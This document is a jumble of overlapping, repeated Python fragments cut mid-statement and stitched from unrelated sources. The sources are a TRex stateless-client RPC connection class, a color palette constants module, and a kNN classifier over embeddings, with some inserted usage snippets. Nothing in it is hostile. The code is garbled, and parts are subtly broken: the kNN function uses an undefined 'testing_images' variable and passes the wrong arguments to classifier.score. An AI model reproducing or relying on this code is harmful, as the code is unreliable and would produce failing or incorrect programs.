"self.sigint_on_conn_lost = False def is_alive (self): ''' return True if any data has",
"must be called after all the config was done ''' return self.async.barrier(baseline =",
"None) def disconnect (self): ''' disconnect from both channels sync and async '''",
"API handler provided by the server self.api_h = None def get_server (self): return",
"= self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch",
"self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch return",
"= logger self.sigint_on_conn_lost = False # API classes self.api_ver = {'name': 'STL', 'major':",
"self.disconnect() return rc def barrier (self): ''' executes a barrier when it retruns,",
"rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state = (self.CONNECTED, None)",
"self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not present in v2.30 and older",
"return self.server def get_port (self): return self.port def connect(self): return self.rpc_link.connect() def disconnect(self):",
"doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): '''",
"= retry) def transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch() for command",
"self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state = (self.CONNECTED, None) return RC_OK()",
"connection is lost a SIGINT will be sent to the main thread '''",
"state object describes the connection to the server state can be either fully",
"thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag",
"(self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def",
"JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import signal",
"2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger, client): self.conn_info = conn_info",
"client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info #",
"what it's doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable",
"self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private ################ def __connect",
"versions') return rc # get the API_H and provide it to the RPC",
"ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import time import signal import os",
"(self, conn_info, logger, client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost = False",
"sigint_on_conn_lost_enable (self): ''' when enabled, if connection is lost a SIGINT will be",
"def get_server (self): return self.server def get_port (self): return self.port def connect(self): return",
"thread to reconnect ''' # avoid any messages handling for the async thread",
"channels) ''' # start with the sync channel self.logger.pre_cmd(\"Connecting to RPC server on",
"if not rc: return rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params",
"fully connected or marked for disconnection ''' DISCONNECTED = 1 CONNECTED = 2",
"''' return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): ''' A multithread safe",
"of the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None):",
"self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1} # low level RPC layer",
"connect async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port'])) rc = self.async.connect()",
"channels) ''' # first disconnect if already connected if self.is_connected(): self.disconnect() # connect",
"return self.async.barrier() def sync (self): ''' fully sync the client with the server",
"conn_info self.logger = logger self.sigint_on_conn_lost = False # API classes self.api_ver = {'name':",
"main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching",
"''' executes a barrier when it retruns, an async barrier is guaranteed '''",
"4, 'minor': 1} # low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'],",
"True if any data has arrived the server in the last 3 seconds",
"the main thread to reconnect ''' # avoid any messages handling for the",
"transmit(self, method_name, params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry",
"self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save",
"''' A multithread safe call any thread can mark the current connection as",
"import time import signal import os ############################ RPC layer ############################# ############################ ############################# ############################",
"is not present in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch",
"self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name, params =",
"# API handler provided by the server self.api_h = None def get_server (self):",
"layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of the",
"cause): ''' A multithread safe call any thread can mark the current connection",
"by the server self.api_h = None def get_server (self): return self.server def get_port",
"as not valid and will require the main thread to reconnect ''' #",
"handler provided by the server self.api_h = None def get_server (self): return self.server",
"(self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self):",
"to the server (two channels) ''' # start with the sync channel self.logger.pre_cmd(\"Connecting",
"async ''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect (self):",
"report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when enabled,",
"= 3 def __init__ (self, conn_info, logger, client): self.conn_info = conn_info self.logger =",
"__init__ (self, conn_info, logger, client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost =",
"CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger, client): self.conn_info",
"__init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server = server self.port = port",
"= CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers",
"''' return True if any data has arrived the server in the last",
"return RC_ERR('Mismatch between client and server versions') return rc # get the API_H",
"disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry",
"return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): ''' A multithread safe call",
"on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return rc # API",
"SIGINT dispatching on case of connection lost ''' self.sigint_on_conn_lost = False def is_alive",
"get the API_H and provide it to the RPC channel from now on",
"self.__connect() if not rc: self.disconnect() return rc def barrier (self): ''' executes a",
"(self): ''' fully sync the client with the server must be called after",
"= False # API classes self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1}",
"first disconnect if already connected if self.is_connected(): self.disconnect() # connect rc = self.__connect()",
"logger self.sigint_on_conn_lost = False # API classes self.api_ver = {'name': 'STL', 'major': 4,",
"################ def __connect (self): ''' connect to the server (two channels) ''' #",
"# invoke the batch return batch.invoke(retry = retry) class Connection(object): ''' Manages that",
"the server connection state object describes the connection to the server state can",
"connect to the server (two channels) ''' # start with the sync channel",
"= None): self.server = server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client)",
"self.logger.pre_cmd(\"Connecting to RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc:",
"to the server connection state object describes the connection to the server state",
"self.port def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def",
"retry = 0): batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h)",
"'major': 4, 'minor': 1} # low level RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'],",
"False def is_alive (self): ''' return True if any data has arrived the",
"is lost a SIGINT will be sent to the main thread ''' self.sigint_on_conn_lost",
"None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def transmit_batch(self,",
"self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not present",
"from .trex_stl_async_client import CTRexAsyncClient import time import signal import os ############################ RPC layer",
"async barrier is guaranteed ''' return self.async.barrier() def sync (self): ''' fully sync",
"def connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self,",
"done ''' return self.async.barrier(baseline = True) def mark_for_disconnect (self, cause): ''' A multithread",
"it to the RPC channel from now on self.rpc.api_h = rc.data()['api_h'] # connect",
"import os ############################ RPC layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes",
"connect (self): ''' connect to the server (two channels) ''' # first disconnect",
"try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect (self): ''' connect",
"def transmit_batch(self, batch_list, retry = 0): batch = self.rpc_link.create_batch() for command in batch_list:",
"CCommLink(object): \"\"\"Describes the connectivity of the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050,",
"server (two channels) ''' # start with the sync channel self.logger.pre_cmd(\"Connecting to RPC",
"case of connection lost ''' self.sigint_on_conn_lost = False def is_alive (self): ''' return",
"the main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable SIGINT",
"not rc: # api_sync_v2 is not present in v2.30 and older if rc.errno()",
"self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'],",
"def get_disconnection_cause (self): return self.state[1] ########## private ################ def __connect (self): ''' connect",
"def mark_for_disconnect (self, cause): ''' A multithread safe call any thread can mark",
"stop what it's doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def",
"def is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] ==",
"= {'name': 'STL', 'major': 4, 'minor': 1} # low level RPC layer self.rpc",
"in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch return batch.invoke(retry = retry)",
"self.async.last_data_recv_ts is not None and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected",
"# avoid any messages handling for the async thread self.async.set_as_zombie() # change state",
"call any thread can mark the current connection as not valid and will",
"for disconnection ''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def",
"self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect (self): ''' connect to the",
"thread can mark the current connection as not valid and will require the",
"rc: return rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver)",
"RPC server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return rc",
"self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info",
"(self.MARK_FOR_DISCONNECT, cause) # if the flag is on, a SIGINT will be sent",
"called after all the config was done ''' return self.async.barrier(baseline = True) def",
"be sent to the main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self):",
"CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info # init state self.state",
"return self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name,",
"self.sigint_on_conn_lost = False # API classes self.api_ver = {'name': 'STL', 'major': 4, 'minor':",
"from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import CTRexAsyncClient import",
"''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__ (self,",
"''' connect to the server (two channels) ''' # start with the sync",
"(self.DISCONNECTED, None) def disconnect (self): ''' disconnect from both channels sync and async",
"barrier is guaranteed ''' return self.async.barrier() def sync (self): ''' fully sync the",
"disconnect if already connected if self.is_connected(): self.disconnect() # connect rc = self.__connect() if",
"import * from .trex_stl_jsonrpc_client import JsonRpcClient, BatchMessage, ErrNo as JsonRpcErrNo from .trex_stl_async_client import",
"self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect",
"client with the server must be called after all the config was done",
"= rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['async_port']))",
"connect(self): return self.rpc_link.connect() def disconnect(self): self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name,",
"stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server =",
"arrived the server in the last 3 seconds ''' return ( self.async.last_data_recv_ts is",
"None def get_server (self): return self.server def get_port (self): return self.port def connect(self):",
"messages handling for the async thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT,",
"def transmit(self, method_name, params = None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h,",
"def __init__ (self, conn_info, logger, client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost",
"if not rc: self.disconnect() return rc def barrier (self): ''' executes a barrier",
"= self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if not rc: # api_sync_v2 is not",
"for command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke the batch return batch.invoke(retry",
"mark the current connection as not valid and will require the main thread",
"client): self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost = False # API classes",
"def sync (self): ''' fully sync the client with the server must be",
"# change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag is on,",
"def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case of connection lost '''",
"CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info",
"all the config was done ''' return self.async.barrier(baseline = True) def mark_for_disconnect (self,",
"and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT) def sigint_on_conn_lost_enable (self): ''' when",
"server self.api_h = None def get_server (self): return self.server def get_port (self): return",
"= None return self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry = 0):",
"RC_ERR('Mismatch between client and server versions') return rc # get the API_H and",
"to stop what it's doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(), signal.SIGINT)",
"lost a SIGINT will be sent to the main thread ''' self.sigint_on_conn_lost =",
"= 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info, logger,",
"self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case of",
"return (self.state[0] == self.CONNECTED) def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause",
"RPC layer self.rpc = CCommLink(self.conn_info['server'], self.conn_info['sync_port'], self.conn_info['virtual'], client) self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client)",
"''' connect to the server (two channels) ''' # first disconnect if already",
"for the async thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause) #",
"0): batch = self.rpc_link.create_batch() for command in batch_list: batch.add(command.method, command.params, self.api_h) # invoke",
"is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private",
"= port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler provided by the",
"mark_for_disconnect (self, cause): ''' A multithread safe call any thread can mark the",
"is not None and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected (self):",
"(self): ''' connect to the server (two channels) ''' # start with the",
"server versions') return rc # get the API_H and provide it to the",
"(self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ########## private ################",
"(two channels) ''' # start with the sync channel self.logger.pre_cmd(\"Connecting to RPC server",
"None): self.server = server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client) #",
"older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions') return",
"self.api_h = None return self.rpc_link.disconnect() def transmit(self, method_name, params = None, retry =",
"class Connection(object): ''' Manages that connection to the server connection state object describes",
"DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3 def __init__ (self, conn_info,",
"connectivity of the stateless client method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client =",
"self.conn_info = conn_info self.logger = logger self.sigint_on_conn_lost = False # API classes self.api_ver",
"RPC to stop what it's doing and report an error if self.sigint_on_conn_lost: os.kill(os.getpid(),",
"to the main thread ''' self.sigint_on_conn_lost = True def sigint_on_conn_lost_disable (self): ''' disable",
"SIGINT will be sent to the main thread ''' self.sigint_on_conn_lost = True def",
"= (self.DISCONNECTED, None) def connect (self): ''' connect to the server (two channels)",
"the ZMQ RPC to stop what it's doing and report an error if",
"None) def connect (self): ''' connect to the server (two channels) ''' #",
"- self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return (self.state[0] == self.CONNECTED) def",
"sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case of connection lost ''' self.sigint_on_conn_lost",
"the API_H and provide it to the RPC channel from now on self.rpc.api_h",
"method\"\"\" def __init__(self, server=\"localhost\", port=5050, virtual=False, client = None): self.server = server self.port",
"RPC layer ############################# ############################ ############################# ############################ ############################# class CCommLink(object): \"\"\"Describes the connectivity of",
"with the server must be called after all the config was done '''",
"self.api_h) # invoke the batch return batch.invoke(retry = retry) class Connection(object): ''' Manages",
"# get the API_H and provide it to the RPC channel from now",
"object describes the connection to the server state can be either fully disconnected,",
"None and ((time.time() - self.async.last_data_recv_ts) <= 3) ) def is_connected (self): return (self.state[0]",
"client = None): self.server = server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port,",
"def is_marked_for_disconnect (self): return self.state[0] == self.MARK_FOR_DISCONNECT def get_disconnection_cause (self): return self.state[1] ##########",
"time import signal import os ############################ RPC layer ############################# ############################ ############################# ############################ #############################",
"= CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info # init state",
"last 3 seconds ''' return ( self.async.last_data_recv_ts is not None and ((time.time() -",
"JsonRpcClient(self.server, self.port, client) # API handler provided by the server self.api_h = None",
"True def sigint_on_conn_lost_disable (self): ''' disable SIGINT dispatching on case of connection lost",
"= None, retry = 0): return self.rpc_link.invoke_rpc_method(method_name, params, self.api_h, retry = retry) def",
"(self): return self.state[1] ########## private ################ def __connect (self): ''' connect to the"
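
A minimal usage sketch for the connection layer above. Everything the code itself does not dictate is an illustrative assumption: the port numbers, the StubLogger (a stand-in for the pre_cmd/post_cmd protocol that __connect() calls), and the watchdog policy. It exists to show the mark_for_disconnect contract: any thread may mark the connection invalid, while only the main thread reconnects.

import threading
import time

class StubLogger:
    # hypothetical stand-in for the logger protocol used by __connect()
    def pre_cmd(self, msg):
        print(msg)
    def post_cmd(self, rc):
        print('... done' if rc else '... failed')

conn_info = {
    'server':     '127.0.0.1',
    'sync_port':  4501,       # illustrative ports, not defaults from the code
    'async_port': 4500,
    'virtual':    False,
}

conn = Connection(conn_info, StubLogger(), client=None)
rc = conn.connect()

# a worker thread marks the connection invalid when data stops flowing...
def watchdog():
    while conn.is_connected():
        time.sleep(1)
        if not conn.is_alive():
            conn.mark_for_disconnect('no data from server for 3 seconds')
            return

threading.Thread(target=watchdog, daemon=True).start()

# ...and the main thread is the only one that actually reconnects
if conn.is_marked_for_disconnect():
    print('reconnecting:', conn.get_disconnection_cause())
    conn.connect()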
"# default color primary = '#007bff' secondary = '#6c757d' success = '#28a745' danger",
"= '#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark = '#23272b' active_white =",
"'#17a2b8' light = '#f8f9fa' dark = '#343a40' white = '#ffffff' black = '#212529'",
"color active_primary = '#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger = '#c82333'",
"# active color active_primary = '#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger",
"active_danger = '#c82333' active_warning = '#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark",
"'#c82333' active_warning = '#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark = '#23272b'",
"'#28a745' danger = '#dc3545' warning = '#ffc107' info = '#17a2b8' light = '#f8f9fa'",
"'#dc3545' warning = '#ffc107' info = '#17a2b8' light = '#f8f9fa' dark = '#343a40'",
"= '#17a2b8' light = '#f8f9fa' dark = '#343a40' white = '#ffffff' black =",
"= '#6c757d' success = '#28a745' danger = '#dc3545' warning = '#ffc107' info =",
"success = '#28a745' danger = '#dc3545' warning = '#ffc107' info = '#17a2b8' light",
"primary = '#007bff' secondary = '#6c757d' success = '#28a745' danger = '#dc3545' warning",
"secondary = '#6c757d' success = '#28a745' danger = '#dc3545' warning = '#ffc107' info",
"danger = '#dc3545' warning = '#ffc107' info = '#17a2b8' light = '#f8f9fa' dark",
"= '#343a40' white = '#ffffff' black = '#212529' # active color active_primary =",
"white = '#ffffff' black = '#212529' # active color active_primary = '#0069d9' active_secondary",
"= '#ffffff' black = '#212529' # active color active_primary = '#0069d9' active_secondary =",
"warning = '#ffc107' info = '#17a2b8' light = '#f8f9fa' dark = '#343a40' white",
"default color primary = '#007bff' secondary = '#6c757d' success = '#28a745' danger =",
"'#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info = '#138496' active_light = '#e2e6ea'",
"'#f8f9fa' dark = '#343a40' white = '#ffffff' black = '#212529' # active color",
"<gh_stars>1-10 # default color primary = '#007bff' secondary = '#6c757d' success = '#28a745'",
"'#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info = '#138496'",
"black = '#212529' # active color active_primary = '#0069d9' active_secondary = '#5a6268' active_success",
"= '#ffc107' info = '#17a2b8' light = '#f8f9fa' dark = '#343a40' white =",
"'#212529' # active color active_primary = '#0069d9' active_secondary = '#5a6268' active_success = '#218838'",
"active_secondary = '#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info",
"'#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark = '#23272b' active_white = '#ffffff'",
"= '#f8f9fa' dark = '#343a40' white = '#ffffff' black = '#212529' # active",
"= '#28a745' danger = '#dc3545' warning = '#ffc107' info = '#17a2b8' light =",
"= '#c82333' active_warning = '#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark =",
"= '#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info = '#138496' active_light =",
"active_warning = '#e0a800' active_info = '#138496' active_light = '#e2e6ea' active_dark = '#23272b' active_white",
"= '#212529' # active color active_primary = '#0069d9' active_secondary = '#5a6268' active_success =",
"dark = '#343a40' white = '#ffffff' black = '#212529' # active color active_primary",
"light = '#f8f9fa' dark = '#343a40' white = '#ffffff' black = '#212529' #",
"info = '#17a2b8' light = '#f8f9fa' dark = '#343a40' white = '#ffffff' black",
"'#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning = '#e0a800'",
"active_success = '#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info = '#138496' active_light",
"'#6c757d' success = '#28a745' danger = '#dc3545' warning = '#ffc107' info = '#17a2b8'",
"'#343a40' white = '#ffffff' black = '#212529' # active color active_primary = '#0069d9'",
"= '#007bff' secondary = '#6c757d' success = '#28a745' danger = '#dc3545' warning =",
"active color active_primary = '#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger =",
"active_primary = '#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning",
"= '#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning = '#e0a800' active_info =",
"'#ffffff' black = '#212529' # active color active_primary = '#0069d9' active_secondary = '#5a6268'",
"'#ffc107' info = '#17a2b8' light = '#f8f9fa' dark = '#343a40' white = '#ffffff'",
"= '#0069d9' active_secondary = '#5a6268' active_success = '#218838' active_danger = '#c82333' active_warning =",
"color primary = '#007bff' secondary = '#6c757d' success = '#28a745' danger = '#dc3545'",
"= '#dc3545' warning = '#ffc107' info = '#17a2b8' light = '#f8f9fa' dark =",
"'#007bff' secondary = '#6c757d' success = '#28a745' danger = '#dc3545' warning = '#ffc107'"
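
A small sketch of one way a default/active palette pair like this might be consumed. The module name colors and the pressed-state lookup are assumptions for illustration, not part of the module itself.

import colors

def button_color(kind, pressed=False):
    """Return the hex color for a palette entry such as 'primary'."""
    # note: the palette defines no active_black, so a pressed 'black'
    # would need a fallback here
    return getattr(colors, 'active_' + kind if pressed else kind)

print(button_color('primary'))         # '#007bff'
print(button_color('primary', True))   # '#0069d9'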
"test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b) for",
"classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN.",
"train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy",
"testing embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size))",
"train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create",
"test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train",
"Create testing embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1,",
"= np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing",
"def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings.",
"distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b) for b in train_images])",
"n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of",
"numpy as np from sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels,",
"np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings.",
"model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels)",
"from sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'):",
"= KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions =",
"train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings =",
"training embeddings. train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size))",
"# Create training embeddings. train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings =",
"train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b) for",
"np from sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis',",
"as np from sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5,",
"algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) # Return",
"test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric,",
"train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images])",
"# Create testing embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings =",
"test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy = classifier.score(test_labels, test_predictions) return",
"KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings)",
"predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy = classifier.score(test_labels, test_predictions)",
"k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b) for b in",
"train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b)",
"KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training",
"sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): #",
"model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings",
"np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier",
"= test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1)",
"test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings,",
"in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b)",
